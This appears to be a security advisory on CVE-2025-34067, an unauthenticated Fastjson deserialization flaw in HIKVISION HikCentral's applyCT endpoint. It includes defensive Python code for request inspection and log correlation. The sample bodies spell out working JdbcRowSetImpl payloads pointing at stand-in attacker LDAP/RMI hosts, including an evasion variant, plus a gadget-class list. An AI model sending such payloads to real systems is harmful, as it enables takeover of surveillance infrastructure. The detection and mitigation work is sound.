A critical vulnerability has been identified in HIKVISION's applyCT component, part of the HikCentral Integrated Security Management Platform. Tracked as CVE-2025-34067 with the maximum CVSS score of 10.0, it allows unauthenticated attackers to execute arbitrary code remotely. The root cause is the platform's use of a vulnerable version of the Fastjson library, which deserializes attacker-supplied JSON into attacker-chosen Java classes. Because HikCentral centrally manages cameras and other security devices, a compromised server exposes every device it controls.
Key Highlights:
1. Vulnerability Details: CVE-2025-34067 (CVSS 10.0) in HIKVISION’s applyCT component permits unauthenticated remote code execution.
2. Exploitation Method: Attackers send a malicious JSON payload to the /bic/ssoService/v1/applyCT endpoint; Fastjson instantiates the class named in the payload, which makes the server open a connection to an attacker-controlled LDAP server and load code from there.
3. Affected Systems: The vulnerability impacts HikCentral surveillance platforms deployed across governmental, commercial, and industrial sectors worldwide.
4. Recommended Actions: Organizations should promptly evaluate their deployments, restrict network access, and contact HIKVISION for patches, as the vulnerability is actively being exploited.
In-Depth Analysis of the Fastjson Deserialization Vulnerability:
The vulnerability is reached through the /bic/ssoService/v1/applyCT endpoint, which hands the request body to the Fastjson library. Fastjson's auto-type feature lets a JSON object name the Java class to instantiate via a special "@type" key, so whoever controls the body can have the server instantiate an arbitrary class and populate its properties from the JSON. The gadget used here is com.sun.rowset.JdbcRowSetImpl, whose properties can be set so that the server performs a JNDI lookup against an attacker-controlled LDAP server. No input validation stands in the way, because the class name and its properties come straight from the request.
In practice the attacker sends an HTTP POST with Content-Type: application/json to the endpoint. The body sets "@type" to com.sun.rowset.JdbcRowSetImpl, points the dataSourceName property at the attacker's server (an ldap:// URL), and sets autoCommit, whose setter calls connect() and resolves the data source through JNDI. Whether that lookup turns into code execution depends partly on the JVM: on JDKs where com.sun.jndi.ldap.object.trustURLCodebase is false (the default since 8u191) the LDAP reference cannot load a remote class, but the LDAP server can still return a serialized Java object that is deserialized with whatever gadget classes exist on HikCentral's classpath, so an up-to-date JDK alone is not a fix. The issue is classified as CWE-502 (Deserialization of Untrusted Data) together with CWE-917 (Expression Language Injection): insufficient validation of the request body lets the attacker choose which class is loaded and what it does.
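The following is an added example, not code from this page or from HIKVISION, showing how an inspection layer in front of the endpoint (a WAF rule or reverse-proxy filter) can recognise the payload shape described above. It walks a JSON body looking for Fastjson "@type" keys and JNDI URLs, undoes the "L…;" class-name wrapping that bypassed older auto-type blacklists, and returns a verdict. The gadget-class list beyond JdbcRowSetImpl and all sample bodies are constructed for illustration; the RCE chain it blocks is the JdbcRowSetImpl behaviour the text describes.

```python
import json
from urllib.parse import urlsplit

# Classes that reach a JNDI lookup or similar sink when Fastjson instantiates them
# through "@type". JdbcRowSetImpl is the one used against applyCT; the others are
# illustrative (assumption), not a vendor blocklist.
GADGET_CLASSES = {
    "com.sun.rowset.JdbcRowSetImpl",
    "org.apache.xbean.propertyeditor.JndiConverter",
    "com.mchange.v2.c3p0.JndiRefForwardingDataSource",
}
# URL schemes that InitialContext.lookup() resolves against a remote server.
JNDI_SCHEMES = {"ldap", "ldaps", "rmi", "iiop"}


def normalize_class_name(name: str) -> str:
    """Strip the 'Lcom.example.Foo;' (or 'LL...;;') descriptor wrapping that
    bypassed Fastjson's auto-type blacklist in several 1.2.x releases."""
    while len(name) > 2 and name.startswith("L") and name.endswith(";"):
        name = name[1:-1]
    return name


def is_jndi_url(value: str) -> bool:
    try:
        return urlsplit(value).scheme.lower() in JNDI_SCHEMES
    except ValueError:  # e.g. malformed IPv6 bracket; treat as not a URL
        return False


def inspect_body(body: str) -> dict:
    """Inspect a JSON request body for Fastjson auto-type abuse.

    Returns the @type classes seen, JNDI URLs found in string values, and a verdict:
    'block'  - a known gadget class carries a JNDI URL (the JdbcRowSetImpl chain),
    'review' - an @type key or JNDI URL appears without the full chain,
    'allow'  - neither indicator is present (or the body is not JSON).
    json.loads decodes "\\u0040type" to "@type", so the common unicode-escape
    evasion is normalised away before the checks run.
    """
    result = {"autotype": [], "jndi_urls": [], "verdict": "allow"}
    try:
        doc = json.loads(body)
    except ValueError:
        return result  # not JSON: Fastjson will not build an object graph from it

    chain_found = False

    def walk(node):
        nonlocal chain_found
        if isinstance(node, dict):
            cls = node.get("@type")
            if isinstance(cls, str):
                cls = normalize_class_name(cls)
                result["autotype"].append(cls)
                # For JdbcRowSetImpl, setAutoCommit() calls connect(), which does
                # InitialContext.lookup(dataSourceName): gadget + JNDI URL = RCE.
                if cls in GADGET_CLASSES and any(
                    isinstance(v, str) and is_jndi_url(v) for v in node.values()
                ):
                    chain_found = True
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for value in node:
                walk(value)
        elif isinstance(node, str) and is_jndi_url(node):
            result["jndi_urls"].append(node)

    walk(doc)
    if chain_found:
        result["verdict"] = "block"
    elif result["autotype"] or result["jndi_urls"]:
        result["verdict"] = "review"
    return result


# Constructed sample bodies for the applyCT endpoint (not captured traffic).
SAMPLES = {
    "benign": '{"user": "alice", "ticket": "abc123"}',
    "chain": ('{"@type": "com.sun.rowset.JdbcRowSetImpl", '
              '"dataSourceName": "ldap://attacker.example:1389/Exploit", "autoCommit": true}'),
    # Same chain with "@" unicode-escaped and the class name descriptor-wrapped.
    "evasive": ('{"\\u0040type": "LLcom.sun.rowset.JdbcRowSetImpl;;", '
                '"dataSourceName": "rmi://attacker.example:1099/Exploit", "autoCommit": true}'),
    # @type on a harmless class plus a JNDI URL elsewhere: worth a look, not a full chain.
    "partial": '{"ticket": {"@type": "java.lang.String"}, "cb": "ldap://203.0.113.5/x"}',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:8s} {inspect_body(body)}")
```

Treat the 'review' verdict as a logging signal rather than a silent allow: a legitimate applyCT request has no reason to carry an "@type" key at all, so in a deployment where the expected schema is known, rejecting any body with that key is the simpler and stronger rule.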
Impacted Systems and Potential Consequences:
The vulnerability affects the HikCentral platform, previously known as the Integrated Security Management Platform, which serves as a comprehensive security management solution extensively deployed across various sectors. The platform’s widespread adoption is particularly concerning, as it provides centralized control over multiple security devices and surveillance systems.
Potential repercussions include unauthorized access to sensitive surveillance data, manipulation of security systems, and the possibility of lateral movement within network infrastructures. Organizations utilizing affected HIKVISION applyCT systems face risks of data breaches, service disruptions, and potential compromise of their entire security infrastructure.
Because the endpoint requires no authentication, an attacker needs nothing more than network reachability to the HikCentral web service, which lowers the barrier to entry considerably. The vulnerability has been reported as exploited in the wild and is tracked as a known-exploited vulnerability.
Risk Factors:
– Affected Products: HIKVISION HikCentral (formerly Integrated Security Management Platform) – applyCT component – Versions using the vulnerable Fastjson library.
– Impact: Remote Code Execution (RCE).
– Exploit Prerequisites: Network access to the /bic/ssoService/v1/applyCT endpoint, the ability to send HTTP POST requests, no authentication, and an attacker-controlled LDAP (or RMI) server that the HikCentral host is permitted to reach outbound.
– CVSS Score: 10.0 (Critical).
Mitigation Strategies:
Organizations should immediately inventory their HIKVISION applyCT deployments and apply network segmentation so that the HikCentral web service is reachable only from the hosts and networks that need it. Because the exploit depends on the server making an outbound JNDI connection, egress filtering that blocks LDAP, LDAPS and RMI from the HikCentral host to anything other than known directory servers removes the most common path to code execution, although it does not fix the underlying deserialization flaw. Monitoring requests to /bic/ssoService/v1/applyCT can help detect exploitation attempts; JSON bodies containing an "@type" key, class names such as com.sun.rowset.JdbcRowSetImpl, or ldap://, ldaps:// and rmi:// URLs have no legitimate reason to appear there and can be dropped at a WAF or reverse proxy. While specific patches have not been detailed in current advisories, users should contact HIKVISION support for remediation guidance and restrict access to the vulnerable endpoint until a fix is available. On the library side, the standard Fastjson hardening is to move to a current release and enable safeMode, which disables auto-type entirely; whether that is possible depends on the Fastjson version HIKVISION bundles, so it is a question for the vendor rather than an operator-side fix.
Security teams should also monitor LDAP and RMI connection attempts originating from HIKVISION systems, particularly ones that follow a POST to the endpoint within a few seconds and go to a destination that is not a known directory server, and consider deploying network-based intrusion detection to flag the request pattern described above.
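The following is an added example, not from this page or the vendor, of the correlation the two paragraphs above recommend: it parses constructed web-access and outbound-connection log lines and raises an alert when the HikCentral host opens an LDAP or RMI connection shortly after a POST to the applyCT endpoint, while ignoring traffic to the site's legitimate directory server. The HikCentral address, the known directory server, the port list and every log line are assumptions made up for the example.

```python
import re
from datetime import datetime, timedelta

ENDPOINT = "/bic/ssoService/v1/applyCT"
HIKCENTRAL_HOST = "10.0.5.20"               # assumption: the HikCentral server's address
KNOWN_DIRECTORY_SERVERS = {"10.0.1.5"}      # assumption: the site's legitimate LDAP/AD server
JNDI_PORTS = {389, 636, 1389, 1099, 1098}   # LDAP, LDAPS, common rogue-LDAP and RMI ports
WINDOW = timedelta(seconds=10)              # how soon after the POST the callback is expected

# Constructed access-log lines in combined log format; not real traffic.
ACCESS_LOG = """\
203.0.113.7 - - [02/Jul/2025:10:14:58 +0000] "GET /bic/ssoService/v1/applyCT HTTP/1.1" 405 0
203.0.113.7 - - [02/Jul/2025:10:15:03 +0000] "POST /bic/ssoService/v1/applyCT HTTP/1.1" 500 1234
198.51.100.9 - - [02/Jul/2025:10:20:00 +0000] "POST /bic/ssoService/v1/applyCT HTTP/1.1" 200 88
"""

# Constructed outbound-connection log for the HikCentral host (firewall/flow style).
CONN_LOG = """\
2025-07-02T10:15:04Z src=10.0.5.20 dst=203.0.113.7 dport=1389 proto=tcp
2025-07-02T10:15:05Z src=10.0.5.20 dst=203.0.113.7 dport=4444 proto=tcp
2025-07-02T10:20:01Z src=10.0.5.20 dst=10.0.1.5 dport=389 proto=tcp
2025-07-02T11:00:00Z src=10.0.5.20 dst=192.0.2.44 dport=389 proto=tcp
"""

ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
CONN_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)")


def parse_access(log: str) -> list[dict]:
    events = []
    for line in log.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            events.append({
                "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
                "src": m["src"], "method": m["method"],
                "path": m["path"].split("?", 1)[0], "status": int(m["status"]),
            })
    return events


def parse_conns(log: str) -> list[dict]:
    conns = []
    for line in log.splitlines():
        m = CONN_RE.match(line)
        if m:
            conns.append({
                "ts": datetime.fromisoformat(m["ts"].replace("Z", "+00:00")),
                "src": m["src"], "dst": m["dst"], "dport": int(m["dport"]),
            })
    return conns


def correlate(access_log: str, conn_log: str) -> list[dict]:
    """Pair POSTs to applyCT with outbound LDAP/RMI connections from the HikCentral host.

    critical: the callback goes to the same address that sent the POST.
    high:     an LDAP/RMI connection to an unknown server follows a POST within WINDOW.
    medium:   an LDAP/RMI connection to an unknown server with no matching POST
              (a delayed callback, or a new integration that should be confirmed).
    Connections to KNOWN_DIRECTORY_SERVERS are HikCentral's normal AD/LDAP traffic.
    """
    posts = [e for e in parse_access(access_log)
             if e["method"] == "POST" and e["path"] == ENDPOINT]
    suspects = [c for c in parse_conns(conn_log)
                if c["src"] == HIKCENTRAL_HOST and c["dport"] in JNDI_PORTS
                and c["dst"] not in KNOWN_DIRECTORY_SERVERS]
    alerts, explained = [], set()
    for post in posts:
        for i, conn in enumerate(suspects):
            if post["ts"] <= conn["ts"] <= post["ts"] + WINDOW:
                explained.add(i)
                alerts.append({
                    "severity": "critical" if conn["dst"] == post["src"] else "high",
                    "post_src": post["src"], "conn_dst": conn["dst"],
                    "dport": conn["dport"], "ts": conn["ts"].isoformat(),
                })
    for i, conn in enumerate(suspects):
        if i not in explained:
            alerts.append({"severity": "medium", "post_src": None, "conn_dst": conn["dst"],
                           "dport": conn["dport"], "ts": conn["ts"].isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in correlate(ACCESS_LOG, CONN_LOG):
        print(alert)
```

Two details of the sample are worth noting. The HTTP 500 on the matching POST is typical of a deserialization gadget that did its work and then failed, so a status filter would not have caught it; the correlation with the outbound connection is what gives confidence. And the follow-on connection to port 4444 (the reverse shell, in this constructed scenario) is deliberately not in JNDI_PORTS: this rule detects the JNDI stage, and a separate rule for unexpected outbound connections from the server should cover whatever comes after it.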